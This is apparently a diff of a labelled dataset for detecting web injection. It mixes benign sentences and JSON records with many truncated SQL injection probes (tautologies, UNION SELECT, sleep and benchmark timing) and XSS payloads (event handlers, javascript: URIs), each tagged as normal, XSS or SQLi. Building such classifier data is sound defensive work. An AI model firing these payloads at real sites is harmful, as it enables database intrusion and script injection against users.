contenteditable>drag me</div",1,XSS,5063 -<isindex onpointerover=alert(1)>XSS</isindex>,1,XSS,3603 -1' where 4115 = 4115,2,SQLi,15765 -"select * from users where id = 1. union select 1,b",2,SQLi,11857 -"<bgsound onmouseenter=""alert(1)"">test</bgsound>",1,XSS,7757 -<button onMove=javascript:alert(1)>,1,XSS,9639 --6067'+ ( select 'bfhf' where 3114 = 3114 union al,2,SQLi,19033 -1'|| ( select 'kgjk' where 3530 = 3530 and 3580 = ,2,SQLi,16413 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10436 -or%201=1,2,SQLi,10087 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10767 -"<nobr onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,2957 -"<samp draggable=""true"" ondrag=""alert(1)"">test</sam",1,XSS,7870 -declare @q nvarchar ( 200 ) 0x730065006c0065006300,2,SQLi,11935 -1' and 8635 = ( select count ( * ) from generate_s,2,SQLi,12107 -<button onSubmit=javascript:alert(1)>,1,XSS,9671 -"<font onmouseup=""alert(1)"">test</font>",1,XSS,5410 -<b id=x tabindex=1 onfocusin=alert(1)></b>,1,XSS,7521 -1'+ ( select 'upmd' where 3438 = 3438,2,SQLi,17488 -"<style>@keyframes x{}</style><th style=""animation-",1,XSS,4440 --7562 ) or 8571 = 8571--,2,SQLi,12199 -Merge data sources.,0,normal,22769 -"<script onmouseup=""alert(1)"">test</script>",1,XSS,4691 -"<script a=`>` SRC=""http://www.securitycompass.com/",1,XSS,1559 -"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0",2,SQLi,10893 -<style>:target {color: red;}</style><template id=x,1,XSS,2489 -"To make a return, Amazon customers select the prod",0,normal,25265 -"-6158"" ) ) ) or 8571 = 8571--",2,SQLi,18148 -"<style>@keyframes slidein {}</style><nav style=""an",1,XSS,3524 -"<style>@keyframes x{}</style><var style=""animation",1,XSS,4543 -1' in boolean mode ) or 5286 = ( select count ( * ,2,SQLi,15372 -"<body oncut=""alert(1)"" contenteditable>test</body>",1,XSS,3401 -select case when 5346 = 8272 then 1 else null end-,2,SQLi,17274 -Dumplin' arrives in select theaters and on Netflix,0,normal,26224 -<dfn onpointermove=alert(1)>XSS</dfn>,1,XSS,2273 -1' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121,2,SQLi,14430 -<form action=x><button>XSS</button><select name=x>,1,XSS,234 -1' ) as jlae where 1650 = 1650,2,SQLi,19173 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) )",2,SQLi,12824 -<textarea autofocus onfocus=alert(1)>//INJECTX,1,XSS,9844 -"1' ) procedure analyse ( extractvalue ( 9255,conca",2,SQLi,16677 -"1 ) ) ) union all select null,null,null--",2,SQLi,22062 -I want to choose a restaurant for a special occasi,0,normal,23946 -select * from users where id = 1 or \.<\ or 1 = 1 ,2,SQLi,11393 -"-6041' ) ) or make_set ( 9835 = 1367,1367 ) and ( ",2,SQLi,17262 -or '1'='1'/*,2,SQLi,9965 -1 ) ) and 6537 = dbms_pipe.receive_message ( chr (,2,SQLi,21496 -</style></scRipt><scRipt>alert(1)</scRipt>,1,XSS,9728 -All clothing and accessories available at select C,0,normal,26392 -1 where 8921 = 8921 rlike ( select * from ( select,2,SQLi,13232 -"1"" ) as dfmm where 7563 = 7563 or 8421 = ( select ",2,SQLi,19141 -1' ) where 2443 = 2443 and char ( 120 ) ||char ( 1,2,SQLi,13202 -Delete spam.,0,normal,23043 -Update page.,0,normal,23090 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#",2,SQLi,10543 -I'm thinking of where to go for a photography sess,0,normal,23751 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10421 -1'+ ( select xlvq where 7470 = 7470 and 3707 = ( s,2,SQLi,22231 -or 1=1 LIMIT 1;#,2,SQLi,10003 -"<col onmouseout=""alert(1)"">test</col>",1,XSS,4648 -1 ) where 3565 = 3565 and 6969 = ( select 6969 fro,2,SQLi,15573 -"1"" ) and elt ( 6651 = 1172,1172 ) and ( ""zfkb"" lik",2,SQLi,14540 -"1"" ) ) and 8407 = ( select count ( * ) from genera",2,SQLi,19052 -"1"" ) as bpmk where 4506 = 4506",2,SQLi,18855 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,16741 -"Select ""Security"" and press X. On the next screen,",0,normal,25671 -1' ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( ,2,SQLi,15739 -"-9848' union all select 1359,1359,1359,1359,1359,1",2,SQLi,17222 -"<picture draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,8459 -"{""id"":null,""firstName"":""Max Ml"",""lastName"":""Tok"",""",0,normal,27145 -<BODY ONLOAD=alert(�XSS�)>,1,XSS,1727 +"<sub draggable=""true"" ondrag=""alert(1)"">test</sub>",1,XSS,5786 +<figcaption id=x tabindex=1 onfocus=alert(1)></fig,1,XSS,4412 +declare @s varchar ( 200 ) select @s = 0x77616974 ,2,SQLi,11691 +"<style>@keyframes slidein {}</style><i style=""anim",1,XSS,5923 +key,0,normal,23130 +1' where 2025 = 2025 and 6414 = ( select count ( *,2,SQLi,21929 +"<body onmouseup=""alert(1)"">test</body>",1,XSS,5414 +"{""id"":null,""firstName"":""国忠"",""lastName"":",0,normal,27346 +"1"" where 9901 = 9901 and ( 2455 = 8499 ) *8499--",2,SQLi,16937 +"1, ( select ( case when ( 5217 = 5217 ) then 1 els",2,SQLi,20008 +"<marquee ondblclick=""alert(1)"">test</marquee>",1,XSS,3244 +Sort the alphabet blocks.,0,normal,22631 +Update the software package to the latest version.,0,normal,22973 +<option onpointerenter=alert(1)>XSS</option>,1,XSS,8496 +Select your contemplate.,0,normal,24972 +<textarea id=ta></textarea><script>ta.appendChild(,1,XSS,9324 +select,0,normal,26611 +1' ) order by 1#,2,SQLi,19256 +"<br onbeforecut=""alert(1)"" contenteditable>test</b",1,XSS,8447 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11112 +"-8893%' ) union all select 1254,1254--",2,SQLi,14514 +"1"" ) ) as uaxn where 5657 = 5657 rlike ( select ( ",2,SQLi,12234 +begin,0,normal,23162 +"<ol onkeydown=""alert(1)"" contenteditable>test</ol>",1,XSS,7295 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3674 +Where did you find that antique watch?,0,normal,22985 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10632 +Select your assert.,0,normal,24962 +"1%"" ) ) and 1083 = 6202",2,SQLi,17191 +"<abbr ondblclick=""alert(1)"">test</abbr>",1,XSS,8943 +"-4005' where 3963 = 3963 or elt ( 1032 = 1032,3623",2,SQLi,17596 +"1"" ) ) as ngvf where 9912 = 9912 or 7552 = ( selec",2,SQLi,19591 +Select bloom.,0,normal,24675 +"<svg onmouseup=""alert(1)"">test</svg>",1,XSS,2936 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10797 +"1' and make_set ( 8403 = 8403,8899 ) and 'lnwe' = ",2,SQLi,15310 +<track onpointermove=alert(1)>XSS</track>,1,XSS,4314 +"1' ) ) union all select null,null,null,null,null,n",2,SQLi,14694 +<track onpointerout=alert(1)>XSS</track>,1,XSS,6600 +"{""id"":16436,""name"":""jmeter test <DO NOT DELETE>""}",0,normal,26799 +"-5207"" where 2050 = 2050 union all select 2050,205",2,SQLi,12492 +"Why not select some Christmas dinnerware for baby,",0,normal,25123 +1 or 7417 = ( select count ( * ) from sysibm.systa,2,SQLi,20628 +Where's the salon?,0,normal,23614 +Select a topic for a discussion.,0,normal,23993 +1 ) where 4600 = 4600 or sleep ( 5 ) --,2,SQLi,16443 +"<cite onmouseenter=""alert(1)"">test</cite>",1,XSS,3415 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))",2,SQLi,10419 +<applet onReadyStateChange applet onReadyStateChan,1,XSS,401 +<style>:target {color: red;}</style><b id=x style=,1,XSS,2988 +"1"" ) ) as brwj where 9180 = 9180",2,SQLi,12767 +"1"" and 9660 = ( select count ( * ) from all_users ",2,SQLi,16046 +ORDER BY 12--,2,SQLi,10254 +<span onpointerleave=alert(1)>XSS</span>,1,XSS,6608 +"{""id"":null,""firstName"":""Adeline"",""lastName"":""Tay"",",0,normal,26897 +"1' ) and 3824 = benchmark ( 5000000,md5 ( 0x765556",2,SQLi,20836 +"waitfor delay '0:0:5' and ( ( ""%"" = """,2,SQLi,20631 +"1"" ) or 4240 = ( select 4240 from pg_sleep ( 5 ) )",2,SQLi,12667 +"<frameset draggable=""true"" ondragenter=""alert(1)"">",1,XSS,6557 +"<details onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,8783 +Where's the cottage?,0,normal,23558 +1' ) ) or 4411 = ( select count ( * ) from sysuser,2,SQLi,20671 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10800 +<style>:target {color:red;}</style><dl id=x style=,1,XSS,5784 +-7187' or 4159 = 7465,2,SQLi,12244 +Select a hairstyle for the special occasion.,0,normal,24166 +-3998' ) ) or 3038 = 3038,2,SQLi,18469 +Where's your SQL book?,0,normal,23406 +"<section draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,7236 +"Rokke, a former US army colonel, also briefed the ",0,normal,25740 +"When choosing colored linens, you should select a ",0,normal,25158 +1' and 1 = ( select count ( * ) from tablenames ) ,2,SQLi,11739 +"<a href=""\x04javascript:javascript:alert(1)"" id=""f",1,XSS,520 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,1757 +<slot id=x tabindex=1 onfocus=alert(1)></slot>,1,XSS,4511 +Join group.,0,normal,23086 +1 ) ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70,2,SQLi,12922 +"1', ( select 9100 = ( 'qqpjq'|| ( select case 9100",2,SQLi,20728 +"-7333%"" ) ) ) or 5903 = ( 'qqpjq'|| ( select case ",2,SQLi,16112 +<code onfocusout=alert(1) tabindex=1 id=x></code><,1,XSS,5266 +&#x03c,1,XSS,1071 +1' ) ) as orvy where 7270 = 7270 union all select ,2,SQLi,15187 +<embed id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,8422 +-1150' ) as hdby where 4032 = 4032 union all selec,2,SQLi,17466 +Select the PRIVACY tab and change your settings to,0,normal,25586 +"<img src\x13=x onerror=""javascript:alert(1)"">",1,XSS,666 +1'+ ( select 'yahd' where 5850 = 5850,2,SQLi,21047 +-3084%' ) ) order by 1--,2,SQLi,13799 "At the same time, the essence of eclecticism is th",0,normal,26341 -key,0,normal,23130 -"-9779' ) ) or make_set ( 9354 = 9354,7185 ) and ( ",2,SQLi,14555 -ORDER BY 12#,2,SQLi,10285 -1' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ),2,SQLi,20089 -<map onpointerover=alert(1)>XSS</map>,1,XSS,4608 -I need to decide where to take my next vacation.,0,normal,23755 -select,0,normal,26585 -"1' ) ) and updatexml ( 3393,concat ( 0x2e,0x717170",2,SQLi,15754 -"1"" where 4450 = 4450 or 6979 = like ( 'abcdefg',up",2,SQLi,22185 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11116 -&#000060,1,XSS,1068 -"<style>@keyframes x{}</style><dfn style=""animation",1,XSS,7281 -"1 AND ELT(1337=1337,SLEEP(5))# 1337",2,SQLi,11259 -""")))) waitfor delay '0:0:20' /*",2,SQLi,10941 -Select deliver.,0,normal,24700 -She chose a recipe to try from the cookbook.,0,normal,23968 -"1"" ) ) ) or 5286 = ( select count ( * ) from all_u",2,SQLi,16007 -<style>:target {color: red;}</style><script id=x s,1,XSS,6167 -"<noframes ondblclick=""alert(1)"">test</noframes>",1,XSS,6462 +1,0,normal,26713 +"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><!",1,XSS,1701 +"1"" ) ) union all select null,null,null,null,null,n",2,SQLi,12167 +1'|| ( select 'wvio' from dual where 8934 = 8934 a,2,SQLi,18264 +1 ) as kjsd where 1670 = 1670 or 1022 = ( select c,2,SQLi,20987 +Select main dish.,0,normal,24436 +"<i draggable=""true"" ondragleave=""alert(1)"">test</i",1,XSS,4919 +"<figcaption onbeforecut=""alert(1)"" contenteditable",1,XSS,7068 +<kbd onblur=alert(1) tabindex=1 id=x></kbd><input ,1,XSS,2981 +"-9718%"" ) union all select 9515,9515,9515#",2,SQLi,20819 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,13753 +`'><script>\xEF\xBF\xBEjavascript:alert(529)</scri,1,XSS,8993 +"<kbd oncontextmenu=""alert(1)"">test</kbd>",1,XSS,6864 +"<multicol onpaste=""alert(1)"" contenteditable>test<",1,XSS,8171 +"1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ",2,SQLi,18668 +"<legend draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,8131 +table,0,normal,23112 +"-5417 or elt ( 1032 = 1032,3623 )",2,SQLi,13647 +1'+ ( select 'ohdf' where 7878 = 7878 and 5678 = 3,2,SQLi,16478 +Where's the barber shop?,0,normal,23615 +"<noscript draggable=""true"" ondrag=""alert(1)"">test<",1,XSS,8387 +"<element onmouseover=""alert(1)"">test</element>",1,XSS,5249 +-9950' or 4425 = 1975,2,SQLi,13467 +1,0,normal,26670 +"<wbr draggable=""true"" ondrag=""alert(1)"">test</wbr>",1,XSS,3899 +1 ) where 9821 = 9821 or ( select * from ( select ,2,SQLi,17736 +<IMG SRC=�jav&#x09;ascript:alert(�XSS�);�>,1,XSS,1723 +I'm considering where to have a peaceful retreat.,0,normal,23894 +"<aside onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,3780 +1 ) and 8635 = ( select count ( * ) from generate_,2,SQLi,16745 +"-3790"" ) as ojgb where 5925 = 5925 union all selec",2,SQLi,15213 +1 ) as yduh where 6481 = 6481 and 6414 = ( select ,2,SQLi,15725 +1 ) as bozx where 2160 = 2160 and sleep ( 5 ) #,2,SQLi,21460 +"<body draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,4053 +"Kirkland's: 50% off select patriotic décor, up to ",0,normal,25921 +"1' ) ) and make_set ( 8245 = 9872,9872 ) and ( ( '",2,SQLi,12283 +1' ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ,2,SQLi,13897 +<thead onpointermove=alert(1)>XSS</thead>,1,XSS,7708 +"-5779 ) union all select 6089,6089--",2,SQLi,20081 +"-3596' ) union all select 5349,5349,5349,5349,5349",2,SQLi,12232 +"<strong onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,7108 +<style>:target {color: red;}</style><marquee id=x ,1,XSS,6375 +<hr id=x tabindex=1 onfocusin=alert(1)></hr>,1,XSS,7247 +admin' ) or '1' = '1,2,SQLi,11880 +"<style>@keyframes x{}</style><video style=""animati",1,XSS,5065 +"<embed onpaste=""alert(1)"" contenteditable>test</em",1,XSS,3605 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,15767 +select * from users where id = 1 union select 1 1a,2,SQLi,11859 +<style>:target {color: red;}</style><time id=x sty,1,XSS,7759 +<button onMoveStart=javascript:alert(1)>,1,XSS,9641 +1 ) ) as cvid where 4381 = 4381 union all select n,2,SQLi,20732 +-1730' or 8571 = 8571--,2,SQLi,16415 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10438 +and 1 in (select var from temp)--,2,SQLi,10089 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10769 +"<figcaption onbeforepaste=""alert(1)"" contenteditab",1,XSS,2958 +"<th oncut=""alert(1)"" contenteditable>test</th>",1,XSS,7872 +select * from users where id = '1' or \< = 1 union,2,SQLi,11937 +1'|| ( select 'rttq' from dual where 7368 = 7368 o,2,SQLi,12109 +<button onTimeError=javascript:alert(1)>,1,XSS,9673 +<section id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,5412 +"<sub onmousedown=""alert(1)"">test</sub>",1,XSS,7523 +"1"" ) ) union all select null,null,null,null,null#",2,SQLi,17490 +"<legend onpaste=""alert(1)"" contenteditable>test</l",1,XSS,4442 +1'+ ( select twyt where 3376 = 3376 and 7756 = dbm,2,SQLi,12201 +Modify your settings.,0,normal,22766 +"<hr onkeydown=""alert(1)"" contenteditable>test</hr>",1,XSS,4693 +"<script a="">'>"" SRC=""http://www.securitycompass.co",1,XSS,1560 +"""),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'",2,SQLi,10895 +"<style>@keyframes x{}</style><textarea style=""anim",1,XSS,2490 +"To pick photos, you can use either Get Latest Phot",0,normal,25262 +"1"" ) as sstd where 9629 = 9629 or updatexml ( 1808",2,SQLi,18150 +"<marquee oncontextmenu=""alert(1)"">test</marquee>",1,XSS,3526 +"<legend onkeydown=""alert(1)"" contenteditable>test<",1,XSS,4545 +-8248 or 5903 = ( 'qqpjq'|| ( select case 5903 whe,2,SQLi,15374 +"<style>@keyframes x{}</style><ruby style=""animatio",1,XSS,3403 +"1' ) ) union all select null,null,null,null,null,n",2,SQLi,17276 +Each offers a handful of channels in the genre you,0,normal,26221 +"<style>@keyframes x{}</style><select style=""animat",1,XSS,2274 +1'+ ( select 'mquh' where 3933 = 3933,2,SQLi,14432 +<form action=x><button>XSS</button><select name=x>,1,XSS,234 +1' ) ) or 7427 = dbms_pipe.receive_message ( chr (,2,SQLi,19171 +1 where 4641 = 4641,2,SQLi,12826 +<button form=test onformchange=alert(1)>//INJECTX,1,XSS,9846 +"1"" ) ) as nejd where 2885 = 2885",2,SQLi,16679 +1'+ ( select sijr where 7250 = 7250,2,SQLi,22060 +I need to decide where to go for a coffee break.,0,normal,23943 +"select * from users where id = 1 or ""%{"" or 1 = 1 ",2,SQLi,11395 +"-5235 ) or make_set ( 9354 = 9354,7185 )",2,SQLi,17264 +or '1′='1,2,SQLi,9967 +1 ) as ahfj where 4776 = 4776 or 7417 = ( select c,2,SQLi,21494 +<svg><x><script>alert&#40;&#39;1&#39;&#41</x>,1,XSS,9730 +"""Ask Dr. Ruth"" and ""Hesburgh"" premiere May 3 in se",0,normal,26463 +select sleep ( 5 ) and ( 'labj' = 'labj,2,SQLi,13234 +"Select ""Make this my home Xbox"" and press A again.",0,normal,25677 +1'+ ( select 'vbqo' where 5630 = 5630 procedure an,2,SQLi,13204 +Select pillow.,0,normal,23040 +Create map.,0,normal,23087 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#",2,SQLi,10545 +I'm thinking of where to go for a creative worksho,0,normal,23748 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10423 +1' in boolean mode ) and 4457 = 3885#,2,SQLi,20526 +"or 1=1 or ""=",2,SQLi,10005 +<hgroup id=x tabindex=1 ondeactivate=alert(1)></hg,1,XSS,4650 +1' ) rlike ( select * from ( select ( sleep ( 5 ) ,2,SQLi,15575 +1'+ ( select dgnt where 4701 = 4701 or 7427 = dbms,2,SQLi,14542 +"1"" ) where 6964 = 6964",2,SQLi,19050 +"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,21867 +1 where 3535 = 3535 and 3580 = ( select count ( * ,2,SQLi,16743 +"Select ""Transfer to Bank"" or ""Transfer Money"" (you",0,normal,25668 +-4498 ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ,2,SQLi,15741 +1' and char ( 107 ) ||char ( 121 ) ||char ( 97 ) |,2,SQLi,17224 +"<style>@keyframes x{}</style><abbr style=""animatio",1,XSS,8461 +"Since that time select Japanese species, chosen fo",0,normal,25545 +<INPUT TYPE=�IMAGE� SRC=�javascript:alert(�XSS�);�,1,XSS,1728 +Autonomous weapons select and fire on targets with,0,normal,26338 +set,0,normal,23127 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,14557 +ORDER BY 14#,2,SQLi,10287 +1 ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) ,2,SQLi,20087 +"<bdo onmouseenter=""alert(1)"">test</bdo>",1,XSS,4610 +"( extractvalue ( 1759,concat ( 0x5c,0x7171706a71, ",2,SQLi,20877 +select,0,normal,26582 +-5020%' ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 1,2,SQLi,15756 +I look forward to the definitive report Chairman G,0,normal,26070 +""" or isNULL(1/0) /*",2,SQLi,11118 +&#0000060,1,XSS,1069 +<kbd id=x tabindex=1 ondeactivate=alert(1)></kbd><,1,XSS,7283 +"1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 13",2,SQLi,11261 +))))) waitfor delay '0:0:20' /*,2,SQLi,10943 +"1"" ) where 9511 = 9511 ( select ( case when ( 4587",2,SQLi,20713 +I want to select a movie to watch tonight.,0,normal,23965 +1 ) ) as kiqk where 7366 = 7366 and ( select * fro,2,SQLi,16009 +<bdo id=x tabindex=1 onfocusin=alert(1)></bdo>,1,XSS,6169 +<rtc id=x tabindex=1 onfocus=alert(1)></rtc>,1,XSS,6464 <input value=<><iframe/src=javascript:confirm(1),1,XSS,890 "<% foo><x foo=""%><script>alert(123)</script>"">",1,XSS,967 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10482 -"1%' union all select null,null,null,null,null,null",2,SQLi,19237 -"<menu ondblclick=""alert(1)"">test</menu>",1,XSS,1964 -<img/src='x'onerror=alert(1)>//INJECTX,1,XSS,9851 -"select * from users where id = 1 or 1#""; union sel",2,SQLi,12063 -"1"" ) and 4386 = utl_inaddr.get_host_address ( chr ",2,SQLi,14497 -"<em onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,1910 -"1' and 3202 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,15691 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8354 -"{""id"":null,""firstName"":""Steleven"",""lastName"":""Ang""",0,normal,27018 -"{""id"":null,""firstName"":""Alexiskandar"",""lastName"":""",0,normal,26949 -1 ) ) ) order by 1--,2,SQLi,20392 -"{""id"":null,""firstName"":""Jett"",""lastName"":""Salvador",0,normal,27012 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2836 -"select * from users where id = 1 or 1#""$ union sel",2,SQLi,11456 -"<s onkeypress=""alert(1)"" contenteditable>test</s>",1,XSS,7214 -<wbr onpointermove=alert(1)>XSS</wbr>,1,XSS,7606 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10484 +1' ) where 9454 = 9454 and char ( 109 ) ||char ( 7,2,SQLi,19235 +<hgroup id=x tabindex=1 onfocusin=alert(1)></hgrou,1,XSS,1965 +<script>alert(1)//INJECTX,1,XSS,9853 +1 or 1 = 1,2,SQLi,12065 +1'|| ( select 'blvu' from dual where 9813 = 9813,2,SQLi,14499 +"<menu onkeyup=""alert(1)"" contenteditable>test</men",1,XSS,1911 +1 ) as pcnd where 4589 = 4589 union all select nul,2,SQLi,15693 +"<td draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,8356 +"{""id"":null,""firstName"":""Demi"",""lastName"":""Chew"",""a",0,normal,27015 +Its 2015 Berry Select Riesling was given a score o,0,normal,25945 +"1' ) ) and row ( 6237,7469 ) > ( select count ( * ",2,SQLi,20390 +"{""id"":null,""firstName"":""Davio"",""lastName"":""Hong"",""",0,normal,27009 +"<basefont onmousemove=""alert(1)"">test</basefont>",1,XSS,2837 +select * from users where id = '1' *$ . or 1 = 1 -,2,SQLi,11458 +<script id=x tabindex=1 onactivate=alert(1)></scri,1,XSS,7216 +<style>:target {color: red;}</style><body id=x sty,1,XSS,7608 "&lt;BODY BACKGROUND=\""javascript&#058;alert('XSS')",1,XSS,976 -"<style>@keyframes x{}</style><mark style=""animatio",1,XSS,2269 -"<marquee onmouseenter=""alert(1)"">test</marquee>",1,XSS,3771 -"-1275"" union all select 7861,7861,7861,7861,7861#",2,SQLi,19674 --3613%' ) or 4144 = ( select upper ( xmltype ( chr,2,SQLi,14985 +"<basefont oncut=""alert(1)"" contenteditable>test</b",1,XSS,2270 +"<fieldset draggable=""true"" ondragenter=""alert(1)"">",1,XSS,3773 +"1"" ) ) ) ( select ( case when ( 5451 = 5451 ) then",2,SQLi,19672 +"1%"" ) ) union all select null,null#",2,SQLi,14987 <script>location=name</script>,1,XSS,133 -declare @s varchar(22) select @s =,2,SQLi,10132 -"1"" and ( select * from ( select ( sleep ( 5 ) ) ) ",2,SQLi,22052 +or '1'='1,2,SQLi,10134 +"1' ) union all select null,null,null,null,null,nul",2,SQLi,22050 `'><script>\xE2\x80\x83javascript:alert(1)</script,1,XSS,582 -Car owners download the free app and select prefer,0,normal,26293 -<script>top['alert'](3)</script>,1,XSS,9717 -"</svg>//[""'`-->]]>]</div>",1,XSS,9036 -end and ( 'hmtt' like 'hmtt,2,SQLi,15993 +CHANCEN pays the upfront costs of a select group o,0,normal,26290 +<script>\u0061\u006C\u0065\u0072\u0074(1)</script>,1,XSS,9719 +"<? '=""foo""><x foo='><img src=x onerror=alert(3)//'",1,XSS,9038 +1' and 6510 = ( select count ( * ) from sysusers a,2,SQLi,15995 "<html onMouseOver html onMouseOver=""javascript:jav",1,XSS,394 -AND 1=1#,2,SQLi,10219 -He ordered a latte from the coffee shop.,0,normal,23881 -1' ) as mara where 7164 = 7164,2,SQLi,22268 -<meta id=x tabindex=1 onfocusin=alert(1)></meta>,1,XSS,8402 -1%' ) ) or 8315 = ( select count ( * ) from sysibm,2,SQLi,17726 -"<SPAN DATASRC=""#"" DATAFLD=""B"" DATAFORMATAS=""HTML"">",1,XSS,8184 -"{""id"":null,""firstName"":""Kia Peng"",""lastName"":""Tan""",0,normal,27232 -"select * from users where id = 1 or "" ) ."" = 1 or ",2,SQLi,11427 -<article id=x tabindex=1 onfocusin=alert(1)></arti,1,XSS,4614 -1 ) where 7881 = 7881 and 9660 = ( select count ( ,2,SQLi,16608 -"1' ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,21984 -"<textarea onmouseover=""alert(1)"">test</textarea>",1,XSS,8594 -"1"" ) ) as itxo where 7916 = 7916",2,SQLi,14169 -Congratulations to our own @ JulienMid and @ Value,0,normal,26509 -1' ) where 5616 = 5616,2,SQLi,18929 -"{""id"":null,""name"":""mine""}",0,normal,26844 -"1"" ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,12191 -"1"" ) ) and 4386 = utl_inaddr.get_host_address ( ch",2,SQLi,21957 -<noembed id=x tabindex=1 onfocusin=alert(1)></noem,1,XSS,2909 -Where did you find that adorable kitten from?,0,normal,23811 -"<isindex oncopy=""alert(1)"" contenteditable>test</i",1,XSS,8072 -or 1=1 limit 1 -- -+,2,SQLi,22489 -1 ) ) and 3707 = ( select count ( * ) from sysibm.,2,SQLi,15891 -"1' or ( select 9173 from ( select count ( * ) ,con",2,SQLi,21146 -<pre onpointerenter=alert(1)>XSS</pre>,1,XSS,5265 -document.write(sadfsa),1,XSS,6164 -Penney has also struggled to select the right asso,0,normal,25786 -<acronym onfocusout=alert(1) tabindex=1 id=x></acr,1,XSS,5482 -select,0,normal,26561 -Select the best lens for capturing moments.,0,normal,24054 -"<figcaption onkeydown=""alert(1)"" contenteditable>t",1,XSS,6896 -The XLE is the Energy Select Sector SPDR Fund ETF.,0,normal,25355 -"1%"" and 6537 = dbms_pipe.receive_message ( chr ( 7",2,SQLi,17194 --8472' ) where 3340 = 3340 or make_set ( 1752 = 99,2,SQLi,14318 -1 and 8407 = ( select count ( * ) from generate_se,2,SQLi,13601 -"<img draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,2651 -Select replace.,0,normal,24759 -"{""id"":null,""name"":""Guardromon (Gold)""}",0,normal,27492 -"<frameset draggable=""true"" ondragstart=""alert(1)"">",1,XSS,8790 -"1"" ) ) as femc where 1313 = 1313 and 4595 = 4595#",2,SQLi,15346 -<tbody id=x tabindex=1 onfocus=alert(1)></tbody>,1,XSS,3191 -"or x""=""x",2,SQLi,9895 -1' where 8749 = 8749 or 8421 = ( select count ( * ,2,SQLi,12350 -"<IMG """"""><SCRIPT>alert("""")</SCRIPT>""\>",1,XSS,3651 -"1"" ) ) as ylah where 9248 = 9248",2,SQLi,18922 -"{""id"":null,""name"":""leg""}",0,normal,26750 -The IMF plans to select its new head by Oct. 4.,0,normal,25427 -<meta id=x tabindex=1 onfocus=alert(1)></meta>,1,XSS,5977 -"<meter onkeydown=""alert(1)"" contenteditable>test</",1,XSS,3371 -"{""id"":8430,""firstName"":""jmeter"",""lastName"":""use in",0,normal,26796 -1 where 6365 = 6365,2,SQLi,19967 -<button onDragEnd=javascript:alert(1)>,1,XSS,9605 -"1"" ) as nixg where 4580 = 4580 and 4241 = convert ",2,SQLi,21799 -"<nextid onmousemove=""alert(1)"">test</nextid>",1,XSS,1765 -I need to decide where to dine this evening.,0,normal,23876 -"1 ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a",2,SQLi,20552 -Update your feed.,0,normal,22844 -1 ) as zodp where 9112 = 9112,2,SQLi,19475 -1' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121,2,SQLi,15630 -"<body onmouseout=""alert(1)"">test</body>",1,XSS,7904 -1 ) where 2543 = 2543,2,SQLi,13335 -1' or ( select * from ( select ( sleep ( 5 ) ) ) y,2,SQLi,18121 -"-7060' ) or make_set ( 4233 = 1689,1689 ) and ( 't",2,SQLi,14693 --9076'+ ( select lqvj where 8551 = 8551 union all ,2,SQLi,13452 -"1%' ) ) ) union all select null,null#",2,SQLi,13994 -select * from users where id = 1 union select 1||@,2,SQLi,11540 -"1"" ) where 1416 = 